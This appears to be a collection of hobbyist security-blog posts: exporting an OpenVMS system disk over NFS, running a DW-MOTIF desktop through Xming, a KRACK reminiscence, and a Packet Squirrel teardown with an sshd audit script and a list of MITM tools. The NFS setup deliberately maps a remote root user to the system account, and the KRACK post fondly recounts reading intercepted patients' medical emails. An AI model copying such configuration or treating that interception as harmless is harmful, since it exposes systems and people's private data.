Channel: Astr0baby's not so random thoughts _____ rand() % 100;

Exploring OpenVMS from “unsecure” NFS mount on linux


Now this is something that no admin would do with his/her OpenVMS system, but since I run this in my lab and I like to experiment, I wanted to share my findings. Getting around the filesystem on OpenVMS is a little clumsy, so I wanted to try to export the whole dka0: (system) disk over NFS, mount it from Linux and explore it from there (find, grep, strings, hexedit ... you name it).

Prerequisites of this experiment are that you already have a running OpenVMS 8.4-2 system on your alphavm_free simulation as described here:

https://astr0baby.wordpress.com/2017/03/30/installing-openvms-v8-4-2-on-alphavm-pt-1/

https://astr0baby.wordpress.com/2017/04/02/installing-openvms-v8-4-2-on-alphavm-pt-2/

Do some time traveling if your TCPIP license expired ;)

So let's enable the NFS server on OpenVMS; log in as system and execute

$ @tcpip$config

Choose 3 – Server components

Now select NFS and set it up first (make sure you start the service once it is enabled; this is how it should look once set up). Exit from NFS Configuration with [E] and set up PORTMAPPER (option 15).

Once enabled we are good; jump out of the menu via [E] back to the shell, and once there execute the following to get info about the disk to share via NFS

$ sh dev dk
Device Device Error Volume Free Trans Mnt
 Name Status Count Label Blocks Count Cnt
ALPHA1$DKA0: Mounted 0 ALPHASYS 8272640 356 1
ALPHA1$DKA200: Online 0
ALPHA1$DKA400: Online wrtlck 0

We want to share DKA0: (volume label ALPHASYS) via NFS.

Jump to the TCPIP subsystem (please note this is VERY UNSECURE :) ). 10.0.2.2 is the IP address of the br0 interface on our Linux host; uid=0 and gid=0 let the Linux root user mount the NFS export, and system is the OpenVMS account that has all the rights ....

$ tcpip
TCPIP> set host panasonic /address=10.0.2.2    (choose some other hostname)
TCPIP> map "/ALPHASYS" dka0:
TCPIP> add export "/ALPHASYS" /host=10.0.2.2
TCPIP> add proxy system /uid=0 /gid=0 /host=10.0.2.2

So now we should be able to query the simulated OpenVMS from our Linux host

panasonic mnt # showmount -e 10.0.2.12
Export list for 10.0.2.12:
/ALPHASYS PANASONIC
panasonic mnt #

And finally mount it

mount -o nolock 10.0.2.12:/ALPHASYS /mnt/nfs

Next we “explore”

(screenshots: exploring the mounted OpenVMS filesystem from Linux; Gentoo Alpha image)

What me worry ? #Krack


The latest news about KRACK gave me a nice flashback to 2005 and 2006. Back then almost nobody used wireless encryption, nor HTTPS as the default for web traffic. Those were the days ....

We have survived the 0ld days of clear-text protocols with some hiccups, sure, and most of us had a lot of fun abusing them.

Back in 2005/2006 I remember that it was not uncommon for blood test diagnosis labs to transmit unencrypted WIFI data (including names of patients, “SocialSecurityNumbers” and the medical results of each blood test).

I remember reading mails from the blood testing diagnosis lab nurses complaining about Syphilis tests that showed all prostitutes in the area as positive, requesting new sets of tests as these were most probably false positives. The next batch showed all negative results ... As well as seeing all the pr0n requests made by the admins of such organizations.

Also it was pretty much standard stuff to run unencrypted “Peer WIFI” networks using “Home-Made WIFI Antennas”, so all that was really needed was to get on top of a flat rooftop and collect the “unencrypted” wireless data.

We have already been through all of this, so I think there is no need to panic about KRACK; just patch your systems and keep on truckin’



Setting up DW-MOTIF on OpenVMS 8.4-2 alphavm (linux64)


OK, this was one of the toughest missions, one that I would not have been able to finish without some external help (Thanks to ) who pointed me in the right direction on how to obtain the proper OpenVMS Hobbyist license.

Please refer to the following OpenVMS articles before you get started

https://astr0baby.wordpress.com/2017/03/30/installing-openvms-v8-4-2-on-alphavm-pt-1/

https://astr0baby.wordpress.com/2017/04/02/installing-openvms-v8-4-2-on-alphavm-pt-2/

So these are the steps I have taken (first you need to register with DECUServe). Check more info @ http://104.207.199.162/

To register for DECUServe

- ssh to eisner.decuserve.org
- login with username REGISTRATION
- follow the bouncing ball..

Make sure you add the following ~/.ssh/config entry for the above host on your Linux machine (if your OpenSSH is recent, it no longer offers these legacy algorithms by default)

Host eisner.decuserve.org
    KexAlgorithms +diffie-hellman-group1-sha1
    HostKeyAlgorithms +ssh-dss

Once you get registered on DECUServe you can apply for the hobbyist licenses via https://www.hpe.com/h41268/live/index_e.aspx?qid=24548

It took me a day before I received the Hobbyist License PAK.

Once you have it, install the DW-MOTIF license as follows

Load license for DW-MOTIF

$ @SYS$UPDATE:VMSLICENSE

Register DW-MOTIF like so

grep for the DW-MOTIF info in the LIC file you receive.

                     Issuer:  DEC
              Authorization:  xxxxxxxxx
               Product Name:  DW-MOTIF
                   Producer:  DEC
                      Units:  0
               Release Date:
                    Version:
           Termination Date:  xxxxxxxx
               Availability:
                   Activity:  CONSTANT=100
                    Options:
                      Token:
                Hardware ID:
                   Checksum:  xxxxxxxx

Next we will configure Xming via wine on Linux to actually be able to connect to the simulated OpenVMS Motif desktop.

Unfortunately both Xnest and Xephyr don't work well in this case (both crash after approx. 1 minute of the OpenVMS Desktop)

What works for me is the following configuration

(screenshot of the working Xming configuration; the visible values are OpenVMS, OpenVMS and 10.0.2.12)

Next log in to OpenVMS and initiate the OpenVMS Desktop via the following

$ set display/create/node=10.0.2.2/transport=tcpip/server=1
$ run sys$system:decw$startlogin.exe

And on the Linux machine with the installed Xming execute the following

~/.wine/drive_c/Program Files (x86)/Xming $ wine Xming.exe :1

You should now get the following OpenVMS login screen

After you log in with your creds you get the OpenVMS desktop to play around with


Video of the above config

And installing/running Secure Web Browser V1.1-12 for OpenVMS Alpha 


Packet Squirrel hands on


Just got the new toy from Hak5 in my mail recently, called the Packet Squirrel. Here are my first impressions and some information about the device.

To log into the device, connect a CAT5 ethernet cable to your computer and the other end to the ETHERNET IN port (next to the power adapter port).

Bring the local network interface up on your computer and run dhclient on it to get an address from the device.

Connect to it via ssh as follows:

ssh root@172.16.32.1


BusyBox v1.23.2 (2017-06-28 18:58:08 PDT) built-in shell (ash)

  __ (\\_       Packet Squirrel           _//) __
 (_ \( '.)          by Hak5              (.' )/ _)
   ) \ _))   _                     __    ((_ / (
  (_   )_   (') Nuts for Networks ((')    _(   _)


root@squirrel:~#

Running a standard dmesg query is the first thing I usually do

root@squirrel:~# dmesg
[ 0.000000] Linux version 3.18.45 (sebkinne@buildbot) (gcc version 4.8.3 (OpenWrt/Linaro GCC 4.8-2014.04 r49389) ) #49 Thu Jul 13 17:58:25 PDT 2017
[ 0.000000] MyLoader: sysp=d5a28125, boardp=293d0927, parts=b826e6ed
[ 0.000000] bootconsole [early0] enabled
[ 0.000000] CPU0 revision is: 00019374 (MIPS 24Kc)
[ 0.000000] SoC: Atheros AR9330 rev 1
[ 0.000000] Determined physical RAM map:
[ 0.000000] memory: 04000000 @ 00000000 (usable)
[ 0.000000] Initrd not found or empty - disabling initrd
[ 0.000000] Zone ranges:
[ 0.000000] Normal [mem 0x00000000-0x03ffffff]
[ 0.000000] Movable zone start for each node
[ 0.000000] Early memory node ranges
[ 0.000000] node 0: [mem 0x00000000-0x03ffffff]
[ 0.000000] Initmem setup node 0 [mem 0x00000000-0x03ffffff]
[ 0.000000] On node 0 totalpages: 16384
[ 0.000000] free_area_init_node: node 0, pgdat 803660f0, node_mem_map 81000000
[ 0.000000] Normal zone: 128 pages used for memmap
[ 0.000000] Normal zone: 0 pages reserved
[ 0.000000] Normal zone: 16384 pages, LIFO batch:3
[ 0.000000] Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes.
[ 0.000000] Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes
[ 0.000000] pcpu-alloc: s0 r0 d32768 u32768 alloc=1*32768
[ 0.000000] pcpu-alloc: [0] 0 
[ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 16256
[ 0.000000] Kernel command line: board=HAK5-SQUIRREL console=ttyATH0,115200 rootfstype=squashfs,jffs2 noinitrd
[ 0.000000] PID hash table entries: 256 (order: -2, 1024 bytes)
[ 0.000000] Dentry cache hash table entries: 8192 (order: 3, 32768 bytes)
[ 0.000000] Inode-cache hash table entries: 4096 (order: 2, 16384 bytes)
[ 0.000000] Writing ErrCtl register=00000000
[ 0.000000] Readback ErrCtl register=00000000
[ 0.000000] Memory: 60880K/65536K available (2523K kernel code, 143K rwdata, 540K rodata, 240K init, 188K bss, 4656K reserved)
[ 0.000000] SLUB: HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[ 0.000000] NR_IRQS:51
[ 0.000000] Clocks: CPU:400.000MHz, DDR:400.000MHz, AHB:200.000MHz, Ref:25.000MHz
[ 0.000000] Calibrating delay loop... 265.42 BogoMIPS (lpj=1327104)
[ 0.080000] pid_max: default: 32768 minimum: 301
[ 0.080000] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.090000] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.100000] NET: Registered protocol family 16
[ 0.100000] MIPS: machine is Squirrel V1.0
[ 0.570000] Switched to clocksource MIPS
[ 0.580000] NET: Registered protocol family 2
[ 0.580000] TCP established hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.580000] TCP bind hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.580000] TCP: Hash tables configured (established 1024 bind 1024)
[ 0.590000] TCP: reno registered
[ 0.590000] UDP hash table entries: 256 (order: 0, 4096 bytes)
[ 0.600000] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
[ 0.610000] NET: Registered protocol family 1
[ 0.610000] PCI: CLS 0 bytes, default 32
[ 0.620000] futex hash table entries: 256 (order: -1, 3072 bytes)
[ 0.640000] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[ 0.640000] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
[ 0.650000] msgmni has been set to 118
[ 0.660000] io scheduler noop registered
[ 0.660000] io scheduler deadline registered (default)
[ 0.670000] Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled
[ 0.670000] ar933x-uart: ttyATH0 at MMIO 0x18020000 (irq = 11, base_baud = 1562500) is a AR933X UART
[ 0.680000] console [ttyATH0] enabled
[ 0.690000] bootconsole [early0] disabled
[ 0.700000] m25p80 spi0.0: found mx25l12805d, expected m25p80
[ 0.710000] m25p80 spi0.0: mx25l12805d (16384 Kbytes)
[ 0.710000] 5 tp-link partitions found on MTD device spi0.0
[ 0.720000] Creating 5 MTD partitions on "spi0.0":
[ 0.720000] 0x000000000000-0x000000020000 : "u-boot"
[ 0.730000] 0x000000020000-0x00000013aa14 : "kernel"
[ 0.730000] 0x00000013aa14-0x000000ff0000 : "rootfs"
[ 0.740000] mtd: device 2 (rootfs) set to be root filesystem
[ 0.740000] 1 squashfs-split partitions found on MTD device rootfs
[ 0.750000] 0x000000e50000-0x000000ff0000 : "rootfs_data"
[ 0.750000] 0x000000ff0000-0x000001000000 : "art"
[ 0.760000] 0x000000020000-0x000000ff0000 : "firmware"
[ 0.780000] libphy: ag71xx_mdio: probed
[ 1.370000] ag71xx ag71xx.0: connected to PHY at ag71xx-mdio.1:04 [uid=004dd041, driver=Generic PHY]
[ 1.380000] eth0: Atheros AG71xx at 0xb9000000, irq 4, mode:MII
[ 1.970000] ag71xx-mdio.1: Found an AR7240/AR9330 built-in switch
[ 2.000000] eth1: Atheros AG71xx at 0xba000000, irq 5, mode:GMII
[ 2.000000] TCP: cubic registered
[ 2.010000] NET: Registered protocol family 17
[ 2.010000] bridge: automatic filtering via arp/ip/ip6tables has been deprecated. Update your scripts to load br_netfilter if you need this.
[ 2.020000] 8021q: 802.1Q VLAN Support v1.8
[ 2.040000] VFS: Mounted root (squashfs filesystem) readonly on device 31:2.
[ 2.040000] Freeing unused kernel memory: 240K (80384000 - 803c0000)
[ 3.560000] init: Console is alive
[ 3.570000] init: - watchdog -
[ 5.640000] usbcore: registered new interface driver usbfs
[ 5.640000] usbcore: registered new interface driver hub
[ 5.650000] usbcore: registered new device driver usb
[ 5.710000] SCSI subsystem initialized
[ 5.720000] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver
[ 5.730000] ehci-platform: EHCI generic platform driver
[ 5.730000] ehci-platform ehci-platform: EHCI Host Controller
[ 5.740000] ehci-platform ehci-platform: new USB bus registered, assigned bus number 1
[ 5.750000] ehci-platform ehci-platform: irq 3, io mem 0x1b000000
[ 5.770000] ehci-platform ehci-platform: USB 2.0 started, EHCI 1.00
[ 5.770000] hub 1-0:1.0: USB hub found
[ 5.770000] hub 1-0:1.0: 1 port detected
[ 5.780000] ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver
[ 5.790000] ohci-platform: OHCI generic platform driver
[ 5.800000] usbcore: registered new interface driver usb-storage
[ 6.620000] init: - preinit -
[ 7.380000] random: procd urandom read with 11 bits of entropy available
[ 10.570000] mount_root: loading kmods from internal overlay
[ 10.870000] jffs2: notice: (343) jffs2_build_xattr_subsystem: complete building xattr subsystem, 0 of xdatum (0 unchecked, 0 orphan) and 0 of xref (0 dead, 0 orphan) found.
[ 10.890000] block: attempting to load /tmp/jffs_cfg/upper/etc/config/fstab
[ 10.900000] block: extroot: not configured
[ 10.930000] jffs2: notice: (340) jffs2_build_xattr_subsystem: complete building xattr subsystem, 0 of xdatum (0 unchecked, 0 orphan) and 0 of xref (0 dead, 0 orphan) found.
[ 11.050000] block: attempting to load /tmp/jffs_cfg/upper/etc/config/fstab
[ 11.060000] block: extroot: not configured
[ 11.070000] mount_root: switching to jffs2 overlay
[ 11.120000] procd: - early -
[ 11.120000] procd: - watchdog -
[ 11.920000] procd: - ubus -
[ 12.930000] procd: - init -
[ 15.400000] NET: Registered protocol family 10
[ 15.410000] tun: Universal TUN/TAP device driver, 1.6
[ 15.410000] tun: (C) 1999-2004 Max Krasnyansky <maxk@qualcomm.com>
[ 15.430000] ip6_tables: (C) 2000-2006 Netfilter Core Team
[ 15.450000] fuse init (API version 7.23)
[ 15.460000] Loading modules backported from Linux version v4.4-rc5-1913-gc8fdf68
[ 15.470000] Backport generated by backports.git backports-20151218-0-g2f58d9d
[ 15.480000] ip_tables: (C) 2000-2006 Netfilter Core Team
[ 15.500000] nf_conntrack version 0.5.0 (955 buckets, 3820 max)
[ 15.530000] usbcore: registered new interface driver ums-alauda
[ 15.540000] usbcore: registered new interface driver ums-cypress
[ 15.540000] usbcore: registered new interface driver ums-datafab
[ 15.550000] usbcore: registered new interface driver ums-freecom
[ 15.560000] usbcore: registered new interface driver ums-isd200
[ 15.570000] usbcore: registered new interface driver ums-jumpshot
[ 15.570000] usbcore: registered new interface driver ums-karma
[ 15.580000] usbcore: registered new interface driver ums-sddr09
[ 15.590000] usbcore: registered new interface driver ums-sddr55
[ 15.600000] usbcore: registered new interface driver ums-usbat
[ 15.630000] xt_time: kernel timezone is -0000
[ 15.750000] PPP generic driver version 2.4.2
[ 15.760000] NET: Registered protocol family 24
[ 21.440000] hub 1-0:1.0: USB hub found
[ 21.450000] hub 1-0:1.0: 1 port detected
[ 37.340000] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready
[ 37.390000] IPv6: ADDRCONF(NETDEV_UP): eth1: link is not ready
[ 38.990000] eth1: link up (1000Mbps/Full duplex)
[ 38.990000] IPv6: ADDRCONF(NETDEV_CHANGE): eth1: link becomes ready
[ 80.280000] random: nonblocking pool is initialized
[ 261.110000] eth1: link down
[ 264.290000] eth0: link up (100Mbps/Full duplex)
[ 264.290000] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready

Let's see what kernel and arch we are running here ... MIPS!

root@squirrel:/etc/ssh# uname -a
 Linux squirrel 3.18.45 #49 Thu Jul 13 17:58:25 PDT 2017 mips GNU/Linux

What is the detailed info about the current kernel ?

root@squirrel:/etc/ssh# cat /proc/version
 Linux version 3.18.45 (sebkinne@buildbot) (gcc version 4.8.3 (OpenWrt/Linaro GCC 4.8-2014.04 r49389) ) #49 Thu Jul 13 17:58:25 PDT 2017

Let's check what modules are loaded on the Packet Squirrel

root@squirrel:/etc/ssh# lsmod
 arc4 1296 0
 ath 20005 3 ath9k
 ath9k 87286 0
 ath9k_common 19294 1 ath9k
 ath9k_hw 336753 2 ath9k
 cfg80211 216387 4 ath9k
 compat 12643 4 ath9k
 crc16 999 1 ext4
 crc_ccitt 1003 1 ppp_async
 crypto_blkcipher 10503 1 arc4
 crypto_hash 9746 2 ext4
 ehci_hcd 31996 1 ehci_platform
 ehci_platform 3360 0
 ext4 312204 0
 fuse 66153 0
 gpio_button_hotplug 4464 0
 ip6_tables 9281 3 ip6table_raw
 ip6t_REJECT 1184 2
 ip6table_filter 608 1
 ip6table_mangle 1072 1
 ip6table_raw 576 1
 ip_tables 9437 4 iptable_nat
 ipt_MASQUERADE 624 2
 ipt_REJECT 912 2
 iptable_filter 672 1
 iptable_mangle 944 1
 iptable_nat 752 1
 iptable_raw 640 1
 ipv6 257144 24 nf_conntrack_ipv6
 jbd2 47538 1 ext4
 ledtrig_usbdev 1920 0
 mac80211 399098 1 ath9k
 mbcache 4525 1 ext4
 nf_conntrack 47579 11 nf_nat_ipv4
 nf_conntrack_ftp 5264 1 nf_nat_ftp
 nf_conntrack_ipv4 4640 10
 nf_conntrack_ipv6 4928 3
 nf_conntrack_rtcache 2448 0
 nf_defrag_ipv4 790 1 nf_conntrack_ipv4
 nf_defrag_ipv6 9063 1 nf_conntrack_ipv6
 nf_log_common 2271 2 nf_log_ipv4
 nf_log_ipv4 3120 0
 nf_log_ipv6 3280 0
 nf_nat 8843 5 nf_nat_ipv4
 nf_nat_ftp 1184 0
 nf_nat_ipv4 3649 1 iptable_nat
 nf_nat_masquerade_ipv4 1388 1 ipt_MASQUERADE
 nf_reject_ipv4 1811 1 ipt_REJECT
 nf_reject_ipv6 1879 1 ip6t_REJECT
 nls_base 4960 1 usbcore
 ohci_hcd 22175 1 ohci_platform
 ohci_platform 2736 0
 ppp_async 6320 0
 ppp_generic 20578 3 pppoe
 pppoe 8160 0
 pppox 1338 1 pppoe
 scsi_mod 85623 3 ums_cypress
 sd_mod 25536 0
 slhc 4283 1 ppp_generic
 tun 15183 0
 ums_alauda 8240 0
 ums_cypress 2224 0
 ums_datafab 4656 0
 ums_freecom 1952 0
 ums_isd200 5008 0
 ums_jumpshot 3584 0
 ums_karma 1520 0
 ums_sddr09 8688 0
 ums_sddr55 4800 0
 ums_usbat 7312 0
 usb_common 1144 1 usbcore
 usb_storage 37727 10 ums_usbat
 usbcore 118164 16 ums_usbat
 x_tables 11746 26 ipt_REJECT
 xt_CT 2208 0
 xt_LOG 752 0
 xt_REDIRECT 1040 0
 xt_TCPMSS 2592 2
 xt_comment 480 76
 xt_conntrack 2160 12
 xt_id 480 0
 xt_limit 992 20
 xt_mac 624 0
 xt_mark 656 0
 xt_multiport 1168 0
 xt_nat 1056 0
 xt_state 688 0
 xt_tcpudp 1680 10
 xt_time 1632 0

How is the kernel loaded ?

root@squirrel:/etc/ssh# cat /proc/cmdline
 board=HAK5-SQUIRREL console=ttyATH0,115200 rootfstype=squashfs,jffs2 noinitrd

Let's check the CPU info

root@squirrel:/etc/ssh# cat /proc/cpuinfo
 system type : Atheros AR9330 rev 1
 machine : Squirrel V1.0
 processor : 0
 cpu model : MIPS 24Kc V7.4
 BogoMIPS : 265.42
 wait instruction : yes
 microsecond timers : yes
 tlb_entries : 16
 extra interrupt vector : yes
 hardware watchpoint : yes, count: 4, address/irw mask: [0x0ffc, 0x0ffc, 0x0ffb, 0x0ffb]
 isa : mips1 mips2 mips32r1 mips32r2
 ASEs implemented : mips16
 shadow register sets : 1
 kscratch registers : 0
 package : 0
 core : 0
 VCED exceptions : not available
 VCEI exceptions : not available

Looks like this system is a modified OpenWrt

root@squirrel:/etc/ssh# cat /etc/openwrt_version
 15.05.1

First thing after the initial login: regenerating the DSA/RSA host keys and changing the default root password is good practice

root@squirrel:/etc/ssh# ls -al
 drwxrwxr-x 1 root root 0 Jul 14 00:59 .
 drwxrwxr-x 1 root root 0 Jul 14 01:06 ..
 -rw-r--r-- 1 root root 1632 Jul 5 02:33 ssh_config
 -rw------- 1 root root 668 Jul 14 00:59 ssh_host_dsa_key
 -rw-r--r-- 1 root root 603 Jul 14 00:59 ssh_host_dsa_key.pub
 -rw------- 1 root root 1675 Jul 14 00:59 ssh_host_rsa_key
 -rw-r--r-- 1 root root 395 Jul 14 00:59 ssh_host_rsa_key.pub
 -rw-rw-r-- 1 root root 114 Jul 5 02:29 sshd_config
root@squirrel:/etc/ssh# rm ssh_host_rsa_key*
root@squirrel:/etc/ssh# rm ssh_host_dsa_key*

root@squirrel:/etc/ssh# ssh-keygen -f /etc/ssh/ssh_host_rsa_key -N '' -t rsa
root@squirrel:/etc/ssh# ssh-keygen -f /etc/ssh/ssh_host_dsa_key -N '' -t dsa

root@squirrel:/etc/ssh# passwd

Let’s check the OpenSSH version on the Packet Squirrel and some configuration details

root@squirrel:/etc/ssh# /usr/sbin/sshd --version
OpenSSH_7.1p2, OpenSSL 1.0.2j 26 Sep 2016
root@squirrel:/etc/ssh# cat /etc/ssh/sshd_config
  PermitRootLogin yes
  PubkeyAuthentication yes
  AuthorizedKeysFile .ssh/authorized_keys
  Subsystem sftp internal-sftp

What options does sshd run with (the defaults, apart from the above)?

root@squirrel:/etc/ssh# /usr/sbin/sshd -T

port 22
 protocol 2
 addressfamily any
 listenaddress 0.0.0.0:22
 listenaddress [::]:22
 serverkeybits 1024
 logingracetime 120
 keyregenerationinterval 3600
 x11displayoffset 10
 maxauthtries 6
 maxsessions 10
 clientaliveinterval 0
 clientalivecountmax 3
 streamlocalbindmask 0177
 permitrootlogin yes
 ignorerhosts yes
 ignoreuserknownhosts no
 rhostsrsaauthentication no
 hostbasedauthentication no
 hostbasedusesnamefrompacketonly no
 rsaauthentication yes
 pubkeyauthentication yes
 passwordauthentication yes
 kbdinteractiveauthentication yes
 challengeresponseauthentication yes
 printmotd yes
 printlastlog yes
 x11forwarding no
 x11uselocalhost yes
 permittty yes
 permituserrc yes
 strictmodes yes
 tcpkeepalive yes
 permitemptypasswords no
 permituserenvironment no
 uselogin no
 compression delayed
 gatewayports no
 usedns no
 allowtcpforwarding yes
 allowagentforwarding yes
 allowstreamlocalforwarding yes
 useprivilegeseparation yes
 fingerprinthash SHA256
 pidfile /var/run/sshd.pid
 xauthlocation /usr/bin/xauth
 ciphers chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
 macs umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
 versionaddendum none
 kexalgorithms curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1
 hostbasedacceptedkeytypes ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,ssh-rsa
 hostkeyalgorithms ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,ssh-rsa
 pubkeyacceptedkeytypes ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,ssh-rsa
 loglevel INFO
 syslogfacility AUTH
 authorizedkeysfile .ssh/authorized_keys
 hostkey /etc/ssh/ssh_host_rsa_key
 hostkey /etc/ssh/ssh_host_dsa_key
 hostkey /etc/ssh/ssh_host_ecdsa_key
 hostkey /etc/ssh/ssh_host_ed25519_key
 subsystem sftp internal-sftp
 maxstartups 10:30:100
 permittunnel no
 ipqos lowdelay throughput
 rekeylimit 0 0
 permitopen any
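A small audit of that effective configuration, added here as an example (it is not from the original post and not Hak5's code): it reads "sshd -T" output and flags the settings worth tightening on a freshly unboxed device (root login and password authentication still on, a DSA host key, SHA-1 based MACs and key exchange). The sample input is a constructed excerpt of the output above; on the device itself you would feed it the live output.

```shell
#!/bin/sh
# Audit the effective sshd configuration as printed by "sshd -T" and flag the
# settings a reviewer would want changed on an appliance like the Packet
# Squirrel. Added example, not from the original post; the sample input is a
# constructed excerpt of the "sshd -T" output shown above.

# audit_sshd_t FILE
#   Reads "key value" lines (the sshd -T format) and prints one "WARN ..." line
#   per risky setting. Returns 0 when nothing was flagged, 1 otherwise.
audit_sshd_t() {
    _warns=0
    while read -r key value; do
        case "$key" in
            protocol)
                case "$value" in
                    *1*) echo "WARN $key $value (SSH protocol 1 is obsolete)"; _warns=$((_warns + 1)) ;;
                esac ;;
            permitrootlogin)
                [ "$value" = "no" ] ||
                    { echo "WARN $key $value (log in as an unprivileged user and escalate instead)"; _warns=$((_warns + 1)); } ;;
            passwordauthentication)
                [ "$value" = "no" ] ||
                    { echo "WARN $key $value (a device shipped with a default root password should be keys-only)"; _warns=$((_warns + 1)); } ;;
            permitemptypasswords)
                [ "$value" = "no" ] ||
                    { echo "WARN $key $value"; _warns=$((_warns + 1)); } ;;
            hostkey)
                case "$value" in
                    *dsa*) echo "WARN $key $value (ssh-dss host keys are limited to 1024 bits; remove it)"; _warns=$((_warns + 1)) ;;
                esac ;;
            macs)
                case "$value" in
                    *hmac-sha1*|*md5*) echo "WARN $key offers SHA-1/MD5 MACs: $value"; _warns=$((_warns + 1)) ;;
                esac ;;
            kexalgorithms)
                case "$value" in
                    *-sha1*) echo "WARN $key offers SHA-1 based key exchange: $value"; _warns=$((_warns + 1)) ;;
                esac ;;
            ciphers)
                case "$value" in
                    *cbc*|*arcfour*|*3des*) echo "WARN $key offers CBC/RC4/3DES ciphers: $value"; _warns=$((_warns + 1)) ;;
                esac ;;
        esac
    done < "$1"
    [ "$_warns" -eq 0 ]
}

# count_sshd_warnings FILE : number of WARN lines audit_sshd_t produces.
count_sshd_warnings() {
    audit_sshd_t "$1" | grep -c '^WARN' || true
}

# write_sample_sshd_t FILE : constructed excerpt of the Packet Squirrel's
# "sshd -T" output (see above), used as offline input for the audit.
write_sample_sshd_t() {
    cat > "$1" <<'EOF'
port 22
protocol 2
permitrootlogin yes
passwordauthentication yes
permitemptypasswords no
x11forwarding no
ciphers chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com
macs umac-64-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1
kexalgorithms curve25519-sha256@libssh.org,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1
hostkey /etc/ssh/ssh_host_rsa_key
hostkey /etc/ssh/ssh_host_dsa_key
subsystem sftp internal-sftp
EOF
}

# Stand-alone demonstration on the constructed sample. On the device itself:
#   sshd -T > /tmp/sshd_t.txt; audit_sshd_t /tmp/sshd_t.txt
SAMPLE_SSHD_T=$(mktemp)
write_sample_sshd_t "$SAMPLE_SSHD_T"
audit_sshd_t "$SAMPLE_SSHD_T" ||
    echo "$(count_sshd_warnings "$SAMPLE_SSHD_T") risky setting(s) found"
```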

What default network daemons are listening ?

root@squirrel:/usr/share# netstat -antp
 Active Internet connections (servers and established)
 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
 tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN 1309/dnsmasq
 tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1098/sshd
 tcp 0 0 172.16.32.1:22 172.16.32.132:44530 ESTABLISHED 2301/0
 tcp 0 0 :::53 :::* LISTEN 1309/dnsmasq
 tcp 0 0 :::22 :::* LISTEN 1098/sshd

Finally some info on the local tools available on the Packet Squirrel

root@squirrel:/proc# nmap --version

Nmap version 6.47 ( http://nmap.org )
 Platform: mips-openwrt-linux-gnu
 Compiled with: openssl-1.0.2j nmap-libpcre-7.6 libpcap-1.5.3 nmap-libdnet-1.12 ipv6
 Compiled without: liblua
 Available nsock engines: epoll poll sele

root@squirrel:/proc# openvpn --version
 OpenVPN 2.3.6 mips-openwrt-linux-gnu [SSL (PolarSSL)] [LZO] [EPOLL] [MH] [IPv6] built on Jun 28 2017
 library versions: PolarSSL 1.3.14, LZO 2.08
 Originally developed by James Yonan
 Copyright (C) 2002-2010 OpenVPN Technologies, Inc. <sales@openvpn.net>

root@squirrel:/usr/sbin# ./dsniff -h
 Version: 2.4

root@squirrel:/usr/sbin# ./dnsspoof -h
 Version: 2.4

root@squirrel:/usr/sbin# ./sshmitm -h
 Version: 2.4

root@squirrel:/usr/sbin# ./webmitm -h
 Version: 2.4

root@squirrel:/usr/sbin# ./mailsnarf -h
 Version: 2.4

root@squirrel:/usr/sbin# ./macof -h
 Version: 2.4

root@squirrel:/rom# python2.7 -v
 # installing zipimport hook
 import zipimport # builtin
 # installed zipimport hook
 import site # from /usr/lib/python2.7/site.py
 import os # from /usr/lib/python2.7/os.py
 import errno # builtin
 import posix # builtin
 import posixpath # from /usr/lib/python2.7/posixpath.py
 import stat # from /usr/lib/python2.7/stat.py
 import genericpath # from /usr/lib/python2.7/genericpath.py
 import warnings # from /usr/lib/python2.7/warnings.py
 import linecache # from /usr/lib/python2.7/linecache.py
